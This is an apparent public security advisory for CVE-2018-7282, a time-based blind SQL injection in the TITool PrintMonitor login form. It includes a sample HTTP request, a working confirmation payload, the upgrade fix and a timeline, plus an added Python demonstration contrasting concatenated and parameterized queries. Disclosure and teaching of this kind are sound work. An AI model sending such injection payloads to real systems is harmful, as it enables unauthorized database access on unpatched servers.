# Title: TITool PrintMonitor Blind-SQL Injection
# Date: 12/05/2019
# Vendor Homepage: www.titool.eu
# Version: TITool PrintMonitor prior to PM18.2.1
# Author: fenceposterror
# CVE : 2018-7282
# CVSS v3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/E:F/RL:O/RC:C/CR:X/IR:X/AR:X/MAV:X/MAC:L/MPR:N/MUI:N/MS:U/MC:L/MI:L/MA:N
# CVSS Base Score: 6.5

Introduction:
-------------
PrintMonitor collects activities on the devices.

Affected:
---------
TITool PrintMonitor prior to PM18.2.1

Technical Description:
----------------------
The username parameter during the login request is vulnerable to and/or time-based blind SQLi.

A valid request:

POST /login.php HTTP/1.1
Host: vulnerable.host.tld
Content-Length: 41
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Referer: http://vulnerable.host.tld/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

username=admin&password=admin&language=en

Attack Payload for confirmation:

username=admin') AND 4197=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- nVTH&password=admin&language=en

Fix:
----
Upgrade to PM18.2.1.

Timeline:
---------
2018-02-19 Discovery
2018-02-20 Initial vendor contact
2018-02-20 Initial vendor response
2018-02-21 CVE requested
2018-05-22 Request update from vendor
2018-05-23 Fix version provided
2019-12-05 Release public info
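
For the Technical Description above, an added example (not the vendor's code and not part of the original advisory) showing why the `')` prefix in the username value matters and what a bound parameter changes. It assumes a SQLite backend, inferred from the SQLite functions in the payload; the `users` schema, the query shape and all function names are hypothetical, and the payload is a constructed variant with a 5-byte blob.

```python
import sqlite3

# Constructed variant of the advisory's confirmation payload: same shape,
# but a 5-byte blob so running it costs no CPU or memory.
PAYLOAD = "admin') AND 4197=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10/2))))-- nVTH"


def login_concatenated(conn, username, password):
    # Assumed vulnerable shape: the value is pasted between (' and ').
    sql = ("SELECT 1 FROM users WHERE (username = '" + username +
           "') AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    # Hardened shape: values are bound and never parsed as SQL.
    sql = "SELECT 1 FROM users WHERE (username = ?) AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def functions_compiled(login, username, password="admin"):
    """Return the SQL function names SQLite compiles for one login call."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")  # assumed schema
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    conn.commit()
    seen = set()

    def authorizer(action, arg1, arg2, dbname, source):
        # SQLite reports every function referenced by a statement at prepare time.
        if action == sqlite3.SQLITE_FUNCTION:
            seen.add((arg2 or "").lower())
        return sqlite3.SQLITE_OK

    conn.set_authorizer(authorizer)
    try:
        login(conn, username, password)
    finally:
        conn.close()
    return seen


if __name__ == "__main__":
    print("concatenated :", sorted(functions_compiled(login_concatenated, PAYLOAD)))
    print("parameterized:", sorted(functions_compiled(login_parameterized, PAYLOAD)))
```

With concatenation the username text reaches the SQL compiler and `RANDOMBLOB` becomes part of the statement; with bound parameters the same text is compared as a string and no function is compiled.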